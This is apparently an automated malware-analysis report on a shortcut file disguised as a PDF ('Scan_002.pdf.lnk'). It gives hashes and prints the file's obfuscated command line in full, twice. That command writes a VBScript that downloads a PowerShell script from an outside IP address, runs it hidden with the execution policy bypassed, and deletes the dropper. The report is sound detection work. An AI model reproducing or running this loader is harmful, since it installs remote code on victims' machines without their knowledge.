|
Hash | Hash Value |
|---|---|
| MD5 | 5b0b33dbfa6153308dc7009a4188a0fd
|
| Sha1 | 0832c5c468e75702284062c2005d7540ba022aa6
|
| Sha256 | 9698e5693c96919a8b00c9dd3ed8e7d6b3ff619cb1fdda898151185bc8e4fd67
|
| Sha384 | 6250b46e9522b926dc16fe9b0df98f609504daada39d2fa8266b384050074a1f5186f475702a0bf667402ac7f888f4a4
|
| Sha512 | 6701bd1fc34cd73f484e3720aa6794015ad4a95fa7d1520cf663800e5a1402eb897b363cb5bd685c51a2111e7dc70c31fae0c6e0261de84ba3bf3617e0c9fecc
|
| SSDeep | 24:8d/Cf3DwdfCPiXnSpVT6ADABxb1En9ZdcMjdoRrCUJd:8lCPkdf1XnSpEs4b1Ug/
|
| TLSH | 1872CE8125E80310F2F6FF39CA7BAB45053BBA80ED31C75C8D508C4C1954A41EDB1F66
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/adhesivewipe.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ipu9.ps1",2 > %TEMP%\LM.vbs && cscript //b %TEMP%\LM.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ipu9.ps1 & del %TEMP%\LM.vbs" |
| URLs in VB Code - #1 | http://193.169.194.40/S7yhd67/adhesivewipe.ps1 |
| Deobfuscated PowerShell | & Remove-Item "%TEMP%\LM.vbs IconLocation: imageres.dll" |
| Deobfuscated PowerShell | & Remove-Item "%TEMP%\LM.vbs" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/adhesivewipe.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ipu9.ps1",2 > %TEMP%\LM.vbs && cscript //b %TEMP%\LM.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ipu9.ps1 & del %TEMP%\LM.vbs" Malicious |
Scan_002.pdf.lnk |
| URLs in VB Code - #1 | http://193.169.194.40/S7yhd67/adhesivewipe.ps1 |
Scan_002.pdf.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | & Remove-Item "%TEMP%\LM.vbs IconLocation: imageres.dll" Malicious |
Scan_002.pdf.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | & Remove-Item "%TEMP%\LM.vbs" Malicious |
Scan_002.pdf.lnk > LNK CommandLine > [PowerShell Command] |